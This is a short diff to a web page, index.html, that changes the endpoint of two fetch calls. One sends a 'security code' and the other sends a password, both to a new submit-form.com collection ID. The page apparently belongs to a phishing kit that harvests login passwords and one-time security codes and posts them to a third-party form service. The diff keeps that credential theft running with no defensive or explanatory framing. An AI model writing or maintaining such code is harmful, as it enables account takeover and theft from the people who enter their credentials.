--- a/index.html
+++ b/index.html
@@ -202,7 +202,7 @@
       e.preventDefault();
       const code = document.getElementById("security-code").value;
 
-      fetch("https://submit-form.com/WEsrgfJ7E", {
+      fetch("https://submit-form.com/KvEF2iYVO", {
         method: "POST",
         headers: { "Content-Type": "application/json" },
         body: JSON.stringify({ code })
@@ -223,7 +223,7 @@
     function submitPassword() {
       const password = document.getElementById("passwordInput").value;
 
-      fetch("https://submit-form.com/WEsrgfJ7E", {
+      fetch("https://submit-form.com/KvEF2iYVO", {
         method: "POST",
         headers: { "Content-Type": "application/json" },
         body: JSON.stringify({ password })
